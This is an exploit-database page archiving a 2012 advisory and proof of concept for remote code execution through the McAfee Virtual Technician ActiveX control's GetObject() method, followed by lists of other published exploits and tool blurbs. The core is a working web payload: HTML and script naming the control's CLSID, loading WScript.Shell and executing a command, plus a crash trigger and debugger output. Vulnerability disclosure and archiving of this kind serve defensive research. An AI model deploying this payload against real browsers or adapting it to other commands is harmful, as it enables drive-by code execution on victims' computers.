Search for hundreds of thousands of exploits

"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Code Execution"

Author

Exploit author

rgod

Platform

Exploit platform

windows

Release date

Exploit published date

2012-04-30

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX Control
GetObject() Security Bypass Remote Code Execution Vulnerability

tested against: Microsoft Windows Vista sp2
                Microsoft Windows 2003 r2 sp2
                Internet Explorer 7/8/9

              

product homepage: http://www.mcafee.com/it/downloads/free-tools/virtual-technician.aspx

file tested: MVTInstaller.exe

background:

the mentioned product installs an ActiveX control with
the following settings:

Binary path: C:\Program Files\McAfee\Supportability\MVT\MVT.dll
ProgID: MVT.MVTControl.6300
CLSID: {2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety: false

According to IObjectSafety interface, this control is
safe for scripting, then Internet Explorer will allow
scripting from remote.

Vulnerability:

this control offers the vulnerable GetObject() function,
see typelib:

...
/* DISPID=3 */
/* VT_VARIANT [12] */
function GetObject(
        /* VT_VARIANT [12] [in] */ $in_dwObjectID
        )
{
        /* method GetObject */
}
...

by specifing the ProgID of an arbitrary class from 
the underlying operating system, with no regards for browser security,
is possible to load ex. the WScript.Shell class.
The returned object now offers the Exec() method
which can be used to launch operating system commands.

Example of attack:

<object classid='clsid:2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF' id='obj' />
</object>
<script defer=defer>
var x = obj.GetObject("WScript.Shell");
x.Exec("cmd /c start calc");
</script> 


it is also possible to crash the browser 
by specifying an arbitrary memory address


<object classid='clsid:2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF' id='obj' />
</object>
<script defer=defer>
var x = obj.GetObject(0x0c0c0c0c);
</script>


example crash:
eax=0c0c0c0c ebx=0197085c ecx=01b5efec edx=0000008e esi=01b5efec edi=01b5f344
eip=77bd8efa esp=01b5ef80 ebp=01b5ef80 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
msvcrt!wcslen+0x8:
77bd8efa 668b08          mov     cx,word ptr [eax]        ds:0023:0c0c0c0c=????

debugger shows an access violation while reading 0x0c0c0c0c,
this could be also exploitable but not demonstrated at the time of this report

As attachment, proof of concept code which executes calc.exe, then crash IE.



additional note:
0:010> lm -vm mvt
start    end        module name
03450000 034b8000   MVT        (deferred)             
    Image path: D:\Program Files\McAfee\Supportability\MVT\MVT.dll
    Image name: MVT.dll
    Timestamp:        Thu Jan 12 07:37:26 2012 (4F0E7FA6)
    CheckSum:         0006C308
    ImageSize:        00068000
    File version:     6.3.0.1911
    Product version:  6.3.0.1911
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0409.04e4
    CompanyName:      McAfee, Inc.
    ProductName:      McAfee Virtual Technician
    InternalName:     MVT.dll
    OriginalFilename: MVT.dll
    ProductVersion:   6.3.0.1911
    FileVersion:      6.3.0.1911
    FileDescription:  McAfee, Inc.
    LegalCopyright:   ©2011 McAfee, Inc. All Rights Reserved.

<!--
McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX Control
GetObject() Security Bypass Remote Code Execution PoC

Binary path: C:\Program Files\McAfee\Supportability\MVT\MVT.dll
ProgID: MVT.MVTControl.6300
CLSID: {2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety: false

//rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF' id='obj' />
</object>
<script defer=defer>
var x = obj.GetObject("WScript.Shell");
x.Exec("cmd /c start calc");
var y = obj.GetObject(0x0c0c0c0c);
</script>

//rgod
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2013-12-11 "EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet Remote Code Execution" remote windows rgod
2013-10-04 "Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object - Remote Code Execution" remote php rgod
2013-05-26 "SIEMENS Solid Edge ST4/ST5 WebPartHelper - ActiveX RFMSsvs!JShellExecuteEx Remote Code Execution" remote windows rgod
2013-05-26 "SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution" dos windows rgod
2013-01-07 "Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow (PoC)" dos windows rgod
2012-11-15 "Novell NetIQ Privileged User Manager 2.3.1 - 'ldapagnt.dll' ldapagnt_eval() Perl Code Evaluation Remote Code Execution" remote windows rgod
2012-11-15 "Novell NetIQ Privileged User Manager 2.3.1 - 'auth.dll' pa_modify_accounts() Remote Code Execution" remote windows rgod
2012-08-07 "Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService - Remote File Deletion" remote windows rgod
2012-08-07 "Oracle Business Transaction Management Server 12.1.0.2.7 - FlashTunnelService WriteToFile Message Remote Code Execution" remote windows rgod
2012-08-06 "AOL Products downloadUpdater2 Plugin - 'SRC' Remote Code Execution" dos windows rgod
2012-05-11 "Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow" local windows rgod
2012-04-30 "McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Code Execution" remote windows rgod
2012-04-05 "Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite" remote windows rgod
2012-04-05 "Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite" remote windows rgod
2012-03-28 "D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow" remote hardware rgod
2012-03-28 "Quest InTrust 10.4.x - ReportTree / SimpleTree Classes" remote windows rgod
2012-03-28 "Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution" remote windows rgod
2012-03-28 "TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow" remote hardware rgod
2012-03-22 "Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow (PoC)" dos windows rgod
2012-03-22 "Google Talk - 'gtalk://' Deprecated URI Handler Injection" remote windows rgod
2012-03-19 "LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion" remote windows rgod
2012-03-19 "LANDesk Lenovo ThinkManagement Suite 9.0.3 - Core Server Remote Code Execution" remote windows rgod
2012-03-19 "2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute" remote windows rgod
2012-03-19 "2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite" remote windows rgod
2012-03-19 "Dell Webcam Software Bundled - ActiveX Remote Buffer Overflow" remote windows rgod
2012-03-19 "ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Directory Traversal" webapps jsp rgod
2011-11-07 "Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow" remote windows rgod
2011-11-02 "Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution" remote windows rgod
2011-10-31 "Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Buffer Overflow (PoC)" dos windows rgod
2011-10-24 "Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method" remote windows rgod
import requests
response = requests.get('http://127.0.0.1:8181/api/v1/exploitdetails/18805/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.